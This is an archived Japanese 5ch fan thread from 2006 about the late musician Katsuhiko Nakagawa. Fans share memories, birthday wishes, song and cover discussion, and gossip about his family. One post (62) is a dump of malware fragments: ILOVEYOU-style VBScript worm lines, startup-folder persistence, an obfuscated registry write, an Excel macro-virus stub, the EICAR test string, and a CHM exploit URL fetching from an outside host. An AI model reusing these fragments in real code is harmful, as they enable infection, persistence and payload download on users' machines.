5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ぼくの想いは愛せいいっぱい・中川勝彦 Part4

1 :伝説の名無しさん:2006/07/08(土) 16:02:51
‘94年に急性骨髄性白血病で亡くなった
ミュージシャン・中川勝彦を語るスレです。

過去スレ

ぼくの想いは愛せいいっぱい・中川勝彦 Part3
http://music4.2ch.net/test/read.cgi/legend/1133379614/

ぼくの想いは愛せいいっぱい・中川勝彦 Part2
http://music4.2ch.net/test/read.cgi/legend/1075325710/

永遠の貴公子・中川勝彦
http://music2.2ch.net/test/read.cgi/legend/1018908918/

「復刊リクエスト投票」に投票が100票になると勝ちゃんの本が復刊されるかも。
投票してください。よろしくお願いします。
写真集 「夢もよめちゃう」
http://www.fukkan.com/vote.php3?no=311
絵本 「未知の記憶 Unknown Memory」
http://www.fukkan.com/vote.php3?no=7973

2 :伝説の名無しさん:2006/07/08(土) 16:28:48
2ゲッツ
しょこたん萌え

3 :伝説の名無しさん:2006/07/08(土) 18:07:23
【ナイスポ】“しょこたん”こと中川翔子、「出産シーンを絶対ブログで公開するから!」【mmts】
http://news18.2ch.net/test/read.cgi/mnewsplus/1152345539/


4 :伝説の名無しさん:2006/07/08(土) 19:12:45
>>1
乙華麗

5 :伝説の名無しさん:2006/07/09(日) 05:11:41
カッチャン萌え〜

6 :伝説の名無しさん:2006/07/09(日) 16:01:38
age

7 :伝説の名無しさん:2006/07/09(日) 16:43:46
芸能板のしょこスレで見たけど、勝っちゃんコミュにしょこたんも参加してるの?

8 :伝説の名無しさん:2006/07/09(日) 17:45:40
勝っちゃんコミュってなに??

9 :伝説の名無しさん:2006/07/10(月) 00:17:37
mixiでしょ

10 :伝説の名無しさん:2006/07/10(月) 17:27:56
小池徹平としょこたん一緒にTV出るのね

11 :伝説の名無しさん:2006/07/10(月) 17:36:20
腹違い兄弟の共演

12 :伝説の名無しさん:2006/07/10(月) 18:37:42
>>11
それはないw
小池徹平の父親もあんな顔らしいよ
小池父は勝ちゃんに似てるのか見てみたい

13 :伝説の名無しさん:2006/07/10(月) 20:04:06
↑京本さんの親戚だもんね。

14 :伝説の名無しさん:2006/07/11(火) 03:57:15
スレチだが、京本サンの息子はあまり京本サンにあまり似てないね。Jr.にいる子ね。

15 :伝説の名無しさん:2006/07/11(火) 04:06:16
スレ違いだけど、WATは吉井和哉の二月の武道館見に来てたよ。仲良くて微笑ましかった。


近くで見たけど小池てっぺい可愛いね。

でも、ヤッパリかっちゃんの方がいい男だなって思っちゃった。



16 :伝説の名無しさん:2006/07/11(火) 04:24:24
かっちゃん若返ったちっくな小池徹平

ttp://bingoimage.naver.com/data3/bingo_42/imgbingo_94/code__37/35895/code__37_35.jpg

17 :伝説の名無しさん:2006/07/11(火) 13:38:00
なんとなく似てるね。
それで、なのかな『医龍』見ちゃってたの…

18 :伝説の名無しさん:2006/07/11(火) 13:39:38
あの徹平ちゃん
銀ブチめがねだった事もあって
かっちゃんによく似てたね

19 :伝説の名無しさん:2006/07/11(火) 18:07:01
勝ちゃんの方が涼し気な印象だな〜

20 :伝説の名無しさん:2006/07/11(火) 18:15:31
かっちゃんとほおずき、とか朝顔、の写真
ブログに、のせてくれ〜(涼)

21 :伝説の名無しさん:2006/07/11(火) 19:01:22
勝ちゃんのお姉さんって、やっぱり美形なの?

22 :伝説の名無しさん:2006/07/11(火) 21:45:25
ウワサによると中川一家はみなさん普通の顔。勝ちゃんだけ突然変異。

23 :伝説の名無しさん:2006/07/11(火) 21:52:18
お母さんは美人だと思うけどな

24 :伝説の名無しさん:2006/07/11(火) 22:32:23
お母さんは色の白いかわいいお饅頭みたいな顔で、お父さんは輪郭が角ばっているがきれいな顔
声は勝ちゃんとよく似ているよ。

25 :伝説の名無しさん:2006/07/11(火) 23:15:15
>>21
と、いうことで姉貴のプライバシーは保たれた。東洋英和卒くらいしか知らない

26 :伝説の名無しさん:2006/07/12(水) 01:05:58
姉弟揃って頭いいんだねー!

27 :伝説の名無しさん:2006/07/12(水) 03:08:35
姉貴のプライバシーは守られたって…



かっちゃんのお姉さん一般の人でしょ。小冊子に出てた事しか知らないから。良妻賢母目指すお嬢さん大学に行ってたんだね。

28 :伝説の名無しさん:2006/07/12(水) 03:20:35
翔子ちゃんのお母さんの事だって、飲食業とかいくらでも言い方あるような気がするんだけど…



29 :伝説の名無しさん:2006/07/12(水) 03:47:07
う〜ん、、、飲食業て言う言い方も当てはまるのかな〜?
微妙ですな。。。

30 :伝説の名無しさん:2006/07/12(水) 04:47:33
しょうこ 

31 :伝説の名無しさん:2006/07/12(水) 09:30:24
>>28
飲食業ってたいていスナック経営だったるするじゃん。


32 :伝説の名無しさん:2006/07/12(水) 10:20:07
お客にパンツ見せてサービスするような店を
飲食業と言われても・・・w

33 :伝説の名無しさん:2006/07/12(水) 12:30:48
勝ちゃんのお姉さん‥京子さんはねこ顔のきれいな人だよ。お母さんも色白の上品な人。お父さんはヅラ

34 :伝説の名無しさん:2006/07/12(水) 16:42:43


いちいち上げて中川さん宅にやけに親しげな人がいますね。
mixi村でも行って来い。ばかやろうが。

35 :伝説の名無しさん:2006/07/12(水) 16:50:32
何が>>34の琴線に触れたのだろうか?
お父さんはヅラ のところ?

36 :伝説の名無しさん:2006/07/12(水) 17:10:04
しょこたんのブログ本には、お姉さんの事は相関図みたいなやつにも載ってないね。
表にはあまり出たがらない方なのかしら?

37 :伝説の名無しさん:2006/07/12(水) 17:27:16
お姉さんは一般人だから、学歴とかも書かないほうがいいと思う

38 :伝説の名無しさん:2006/07/12(水) 23:48:43
桂子は微妙だよね。

39 :伝説の名無しさん:2006/07/13(木) 01:40:07
しょうこのブログに進んで出てるところをみるとつっこみOKて事じゃ?
>稽古

40 :伝説の名無しさん:2006/07/13(木) 16:17:06
昨日の読売新聞 夕刊に
翔子ちゃんがどぉ〜〜〜んと紹介されてて
かっちゃんのことも少し紹介されてたよ

41 :伝説の名無しさん:2006/07/13(木) 19:59:01
  
   ニャー

42 :伝説の名無しさん:2006/07/13(木) 21:32:50
お父ちゃんの事もあるから
ヲタな話はいいから
骨髄バンクの宣伝とかしれ。しょうこさん。


43 :伝説の名無しさん:2006/07/13(木) 21:36:02
勝ちゃんがパパになったのは、22歳の時だっけ?
今の翔子ちゃんと、大して変わんないんだよなぁ・・・。

44 :伝説の名無しさん:2006/07/13(木) 23:11:20
オーラの泉 に出演するといいよ

45 :伝説の名無しさん:2006/07/14(金) 03:45:39
スレ違いかもしれないけど…
12日にコンビニ7軒回って見付からなくて、13日に新聞屋さんに問合せして、やっと『読売夕刊』読めたよ。
しょうこちゃん、お疲れ様でした。

あの記事は本来ならかっちゃんが、しょうこちゃんとお母さんの為に発表しなくてはいけなかった内容だったように思います。
それとノーメークだと何処となくかっちゃんに似てるね。
半分寝てる様な状態で書いてるので、分かりにくい文章でごめんなさい…

あっ、それとかっちゃんより歌上手いね。CD買うね。

46 :伝説の名無しさん:2006/07/14(金) 04:25:13
スレ違いでつ

47 :伝説の名無しさん:2006/07/14(金) 04:45:58
前のスレからの流れで、ここかなって思ったんだけど、違いましたよね、すみません。

48 :伝説の名無しさん:2006/07/14(金) 19:21:04
サロンあべのという障害者向けボランティア団体の音訳テープ文庫に
絵本 「未知の記憶 Unknown Memory」 の音訳テープがあるみたい
(ボランティアのかたの音読で、貸し出しもしてるようです)

googleで検索してみて発見





49 :伝説の名無しさん:2006/07/14(金) 22:02:16
勝ちゃんが読んでいるテープ販売してくれるといいのにね!聞きたいよー

50 :伝説の名無しさん:2006/07/14(金) 22:55:31
ショコタンじゃ駄目?

51 :伝説の名無しさん:2006/07/14(金) 23:31:57
ダメ 

52 :伝説の名無しさん:2006/07/14(金) 23:33:39
ピンクの人

53 :伝説の名無しさん:2006/07/14(金) 23:45:31
勝ちゃんが読んでいるテープ
ってホントに存在すると〜??

54 :伝説の名無しさん:2006/07/14(金) 23:50:10
↓ここで紹介されてるイベントのことじゃなかと〜???
ttp://www.ne.jp/asahi/kosato/home/music/katsu.htm

55 :伝説の名無しさん:2006/07/14(金) 23:51:37
↓ここで紹介されてるイベントのことじゃなかと〜???
ttp://www.ne.jp/asahi/kosato/home/music/katsu.htm

56 :伝説の名無しさん:2006/07/14(金) 23:53:19
↑の エピソード4 〜雨のキャンプ〜  のところ


57 :伝説の名無しさん:2006/07/14(金) 23:56:31
↑の エピソード4 〜雨のキャンプ〜  のところ


58 :伝説の名無しさん:2006/07/15(土) 00:33:34
>>49 1994年の『未知の記憶』発売当時も本に付いていたのはイメージのインスト曲のカセットテープだけで、一般への朗読カセットテープの発売は無かった気がする。

59 :伝説の名無しさん:2006/07/15(土) 02:37:55
>>50 かっちゃんは車椅子が必要なFUNの人とかが身近に居るようになってから、ボランティアみたいな感じの事をするようになった気がする。

しょうこちゃんの仕事に余裕が出てきたら、自分がした経験から必要だと思うボランティアしたらいいんじゃないかな。
今は自分の夢を叶える時期でしょ。

60 :伝説の名無しさん:2006/07/15(土) 10:30:11
テープの発売はなかったんだけど、亡くなってからスペース小倉屋という所で個展?(絵や写真の展示)が
あった時、会場に流れていましいた。え”?欲しいと思ったんだ!

61 :伝説の名無しさん:2006/07/15(土) 10:43:15
>>50 ショコタンのと父ちゃんのと両方付いてるのもいいな しょうこちゃんの事務所
が企画してくれるといいのになー!無理かな? それがまた「未知の記憶」
が一般の人の目にとまり、評価されるきっかけになる可能性がある。

62 :伝説の名無しさん:2006/07/15(土) 11:08:42
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

63 :伝説の名無しさん:2006/07/15(土) 11:37:21
>>60  ホントに存在するんだね〜(>_<) またイヴェントあるといいね

64 :伝説の名無しさん:2006/07/15(土) 19:39:06
水を差すようで悪いけど、今の翔子の活動見てても
とてもボランティアに通じていく風には見えないな・・・
むしろ真反対いってる気すらする。
でも、人それぞれ生き方はあるし、それがイクナイ!とは
誰にも言えない。
ただ「夢を語る」という意味では楽しくていいのかも知れんが
自分的には歯が浮いてしまうような変な感じが
どうしてもしてしまうのだ。
ネガティブな意見でスマソ

65 :伝説の名無しさん:2006/07/15(土) 20:20:44
>>64
>自分的には歯が浮いてしまうような変な感じが
>どうしてもしてしまうのだ。
>ネガティブな意見でスマソ

そうですねぇ白々しいとまでは言わないけど何か違う。


66 :伝説の名無しさん:2006/07/15(土) 20:21:46
20代前半からそんな雰囲気出てたら気持悪いよ。
具体例出すと誤解招きそうだから控えるけど、意外な人が30近くになった辺りで思いがけない活動してたりするよ。

67 :伝説の名無しさん:2006/07/15(土) 20:34:46
>>66
う〜ん
何がそう思わせるのかは計り知れないが・・・
この先どう変われるかは環境にもよると思うけど
ストイックな雰囲気は感じられないよね。少なくとも。
それは年齢関係ないと思う。
彼女の場合家族が特殊だから、チトかわいそうでもあるが
どういう方に転んでいったとしても、最終的に幸せになれればいいね。

68 :伝説の名無しさん:2006/07/16(日) 01:30:53
モシOK 出たらパパのどの曲カバーするんだろう

69 :伝説の名無しさん:2006/07/16(日) 03:44:24
翔子には自分のオリジナルを追求してほすいね。
それに勝彦とは持ち味違うでしょ。

70 :伝説の名無しさん:2006/07/16(日) 04:51:44
ヤフーの 関連検索ワードのところの項目に
中川勝彦 結婚 
がでてくるところがスゴイ

71 :伝説の名無しさん:2006/07/16(日) 22:40:41
>>653
カバーするなら、BE MY GIRL あたりはどうだろ?
「廻りはじめた ああ二人メーリーゴーランド」っていうところが、物事がはずみをつけて
よくなって行く時に必ず聞こえてきてしまいます。廻り始めた!って。

72 :伝説の名無しさん:2006/07/17(月) 01:10:14
江戸屋百歌撰 亥で、charが『DomーPeri飲んで』カバーしてるね。作曲してるから著作権とかクリアしやすいのかな

73 :伝説の名無しさん:2006/07/17(月) 01:17:56
>>71 どのアルバムに入ってた曲?思い出せない(((・・;)

74 :伝説の名無しさん:2006/07/17(月) 05:06:34
>>73

fromシンデレラのB面

アルバムだとFROM PUBERTYの音泉Q盤

75 :伝説の名無しさん:2006/07/17(月) 07:14:12
裏話に近くなるけど・・・自分で演った方がいいんじゃないかと
言ってたらしいよね>char

76 :伝説の名無しさん:2006/07/17(月) 09:17:52
>>75
それは何でなの?

77 :伝説の名無しさん:2006/07/17(月) 09:47:38
坊やだからさ・・・

↑これもchar(爆)

78 :伝説の名無しさん:2006/07/17(月) 11:47:16
charのやつめ〜(笑)

79 :伝説の名無しさん:2006/07/17(月) 14:34:20
エアロをツェッペリンのコピーバンドって云って位だから、CHARだと云いそう。・゚・(ノД`)・゚・。







でも1995年にインデーズで出してるから、追悼かと…
『誰も解ってるはずのない別れ 君を失うことが こんな風に 自分が失くなるようだ』って歌詞の曲選んでるしね。

80 :伝説の名無しさん:2006/07/17(月) 14:43:27
>>73 ありがとう。Q盤は持って無かった。

81 :伝説の名無しさん:2006/07/17(月) 20:05:00
>>77
ほぉお〜、大人の事情ってかんじがする‥。
そもcharはなんで勝ちゃんと演ることになったのか?


82 :伝説の名無しさん:2006/07/17(月) 21:23:22
>エアロをツェッペリンのコピーバンド
ナルホド言いえて妙だね。

83 :伝説の名無しさん:2006/07/17(月) 21:26:03
>>81
勝ちゃんがcharのファンだったから頼んだんじゃなかった?
と、思ってた。

84 :伝説の名無しさん:2006/07/17(月) 21:29:28
エアロをツェッペリンのコピーバンド

こんなこと言っちゃう様じゃcharも大したこと無いね
いったいどこ聴いてるんだよ

85 :伝説の名無しさん:2006/07/17(月) 21:45:54

>>82

ねぇ。


86 :伝説の名無しさん:2006/07/17(月) 21:46:17
当時雑誌でかっちゃんが今度チャーと一緒にやることになったって喜んでた記事あった。
そんで真っ先にチャーのファンのお姉さんに報告したって書いてあったと思う。
そういえばもうすぐお誕生日だ。
昔々プリンスのコンサートで偶然会って煙草をあげたこと思い出した。
何回しか会ったことなかったのに顔覚えていてくれて嬉しかったなあ。
あー思い出すとせつないけど・・・。

87 :伝説の名無しさん:2006/07/17(月) 21:48:34

>>84

ねぇ。

88 :伝説の名無しさん:2006/07/18(火) 03:57:08
これ激似じゃない?
ttp://yp0223.com.ne.kr/421a9b5bd6412.jpg

89 :伝説の名無しさん:2006/07/18(火) 04:00:03
>>88の説明書くの忘れた orz
ドラゴン桜の小池徹平

90 :伝説の名無しさん:2006/07/18(火) 21:21:42
チト早いが
お誕生日おめでとー。



91 :伝説の名無しさん:2006/07/18(火) 23:19:36
おめでとう!! 不思議だね 最近ここを偶然見つけて書き込みしましたが。
勝ちゃんが亡くなるずっとずっと前、勝ちゃんは何だかものすごく長生きをして、
ある日の88歳の誕生日の日の様子が思い描きもしないのに勝手に浮かんでいた。
孫がうろちょろ走り回り、勝ちゃんがかまぼこみたいな目で笑って、孫がじじい
べろべろなめるなよ(俺を)。

92 :伝説の名無しさん:2006/07/19(水) 02:37:04
>>86 凄く良い話だね。
どんな話が出てくるのか、内心ドキドキしてた(笑)

みんなフライングしすぎだよ。一番乗りしたかったのに、かっちゃん♪HAPPY BIRTH DAY♪
かっちゃんをこの世に誕生させてくれた、パパとママにも感謝♪♪♪

93 :86:2006/07/19(水) 03:20:19
92さん
ありがとう。
あの時かっちゃんは昔のマネOさんと一緒だったよ。
横浜スタジアムで会ったんだけど、会場は禁煙だったから、
煙草吸えなくてつらかったみたい。
(そういえば最近チェリーって売ってないのかしら??)
Oさんは友達が親しかったけど、あの人もいい人だったなあ。
インクスティックとかライブインとかにも行ったけど、なんか何もかも懐かしいな。
この間十年ぶりにデビッド・ボーイ聴いてたらかっちゃんの♪ぷりーずあんだーすたんどみー
聴きたくなった。
あっちのが本家なのに・・・。
チャーといえば渋谷公会堂だったかなあ(他の会場だったかも)、
なんかの曲途中でツェッペリンになって、ワロタ。
あの曲なんだったっけ?
気になる。
誰か教えて〜

とりとめのないカキコでスマソ。



94 :伝説の名無しさん:2006/07/19(水) 16:25:53
しょこたんのブログは最近少し変わってきた気がする。
前よりずい分文章らしくなってきて、まあ読めなくもなくなった。
「神」とか「すごい」とか以外に、感謝の言葉とかたまに見るし。
写真もたまに風景とか入るようになって、
多少人間らしい情緒を感じられるようになったと思うんだけど・・
お仕事もそこそこ入ってきて、大人になってきたのかねぇ〜



95 :伝説の名無しさん:2006/07/19(水) 23:58:28
しょこたんのブログ見ると、感覚や感じている事が先にいっちゃって、言葉が追いつかない感があるよね。
鼻息ばふんって感じる。心の中には、やっぱりばふんて一杯あるのではないかと思った。楽しい。楽しみ。
この調子で、しょこたんらしく進んでほしいです。


96 :伝説の名無しさん:2006/07/20(木) 01:08:15
かっちゃんお誕生日おめでとう。


97 :伝説の名無しさん:2006/07/20(木) 01:21:17
先越されちゃった(笑)

かっちゃん、お誕生日おめでとう。




今でも教えて貰ったエゴンシーレのポストカード大事にしてます。

本当に弱りきった時、かっちゃんから貰った言葉読み返してます。
色々とありがとう。


98 :伝説の名無しさん:2006/07/20(木) 11:20:09
午後、お墓参りに行ってきます。

99 :伝説の名無しさん:2006/07/20(木) 23:55:26
>>98さんが少し羨ましい。




地方だから、中々東京に出られないから。今日はテープ聴きながら絵本読み返したりしてました。

100 :伝説の名無しさん:2006/07/21(金) 10:38:30
98です。お墓参りしてきまつた。かっちゃんのお墓はいつものように
お花でいっぱいで、蝶々が遊びにきていました。
昨日は雨もやんで、静かでゆっくりと時が流れているような感じ・・・
でももう今年、13回忌じゃなかったっけ?

101 :伝説の名無しさん:2006/07/21(金) 12:53:24
お墓参りって、一回しかいった事ありませんが、その時もお花がいっぱいでした。いつもお花がいっぱいなんだ。すごいね!

102 :伝説の名無しさん:2006/07/22(土) 00:36:50
ご両親がいつもきれいにされてるんじゃないでしょうか?


103 :伝説の名無しさん:2006/07/22(土) 00:52:27
かっちゃんに会いたいな

104 :伝説の名無しさん:2006/07/22(土) 01:08:32
夢で逢えるよ

105 :伝説の名無しさん:2006/07/22(土) 20:10:54
そっか、やけに勝彦氏の歌が思い出されると思ったら、7月か…。
当時の勝彦氏と同じ歳になってしまったよ。

「僕は歳をとって色褪せた景色になる この部屋で」

いつも思い出す度に嘘つきだね、と寂しく笑ってしまう。

安らかに。

106 :伝説の名無しさん:2006/07/23(日) 23:07:30
ファーストとセカンド、久しぶりに出してきてみたら、改めて綺麗な人だったなって思っちゃった。
銀色夏生が作詞してたりして、豪華だなって…

学生の時聴いていて、意味の分からなかった歌詞が今改めて聴くと、全く違った意味に受け取れたりするから不思議ですね。


107 :伝説の名無しさん:2006/07/24(月) 13:38:34
ぼくのおーもいーは
あーい せいいいぱあーい
きみのおーもいー も
あーい せいいいぱあいらーぶ
 
遅ればせながら勝っちゃん、おたんじょうびおめでとう。
私たち元気に日々を過ごしてます。
来月の出張の時にでも、お墓参りに行こうかなあ。。

108 :伝説の名無しさん:2006/07/25(火) 00:16:14
一曲、増えてマスタ↓
http://www.youtube.com/results?search=katsuhiko+nakagawa&search_type=search_videos

109 :伝説の名無しさん:2006/07/25(火) 00:28:08
カッチャ〜ン!!! 

110 :伝説の名無しさん:2006/07/25(火) 08:00:09
昔友達がFCに入っててみんなでスキーに行ったとかきいたような気がします
TVや雑誌でしょこたんをみるとついつい心の中で応援しちゃいます(^^)

111 :伝説の名無しさん:2006/07/25(火) 11:17:38
>>106
香水の名前とか。


作られた勝彦氏、完成度ありましたね。

112 :伝説の名無しさん:2006/07/25(火) 12:38:59
>>108
ほんとだ〜
でも、化粧が・・・  (;^Д^A
リストにしょうこちゃんのプロモもあるね。
なんか親子で同じページにのることが、またほほえましい
親孝行な子ぢゃないか!しょうこちゃん
両方とも見たらなんだかうれしくなって涙がでそうになったよ

113 :伝説の名無しさん:2006/07/25(火) 13:26:48
紅茶のCMの映像どこかにないかしら

114 :伝説の名無しさん:2006/07/25(火) 22:41:28
107以降からの書き込みは雰囲気が似てるね。
昔のファン同士だからかな?

115 :伝説の名無しさん:2006/07/26(水) 01:03:53
>>111 香水の名前って、マギー・ノワール?

リアリティないと云うか、不思議な感じですよね。
男性なのにキー高いし。

銀色夏生は個人的に好きだったから記憶に残ってます。

テスのイメージの延長線でセカンドは作られアルバムなんでしょうか?

116 :伝説の名無しさん:2006/07/26(水) 02:10:41
♪香水はエルメス、とか君の好きなパヒューム、ガーデニア。

いかにも故・安井かずみさんテイストで紫のストッキング。

117 :伝説の名無しさん:2006/07/27(木) 20:12:12
正直音痴だと思う

118 :伝説の名無しさん:2006/07/27(木) 21:33:13
激ウマじゃないからこそ伝わる歌だってあるのだよ

119 :伝説の名無しさん:2006/07/27(木) 21:46:42
メポー

120 :伝説の名無しさん:2006/07/27(木) 23:48:11
「してみたい」のプロモ。
このトシになってやっと見れました。
誰か知らないけど、本当にありがとう。ありがとう。


121 :伝説の名無しさん:2006/07/28(金) 01:05:01
病気にならなかったらブログとか今でも
いろんなカタチで活動できたのにね〜

122 :伝説の名無しさん:2006/07/28(金) 08:17:13
もし、病気になっていなかったら・・・やっぱ役者がメインに
なっていたのかなぁ〜

123 :伝説の名無しさん:2006/07/28(金) 10:53:12
本田恭章もついでに見ちまった。この人体形がイマイチだけど、アイドルな華はあるな。
自己陶酔に迷いがないというか。

>113
私も見たい!「テス、ですね?」

生きてたらどうなったんだろね?役者さんかぁ。
そっちのが映像が沢山のこりそうだから歓迎

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)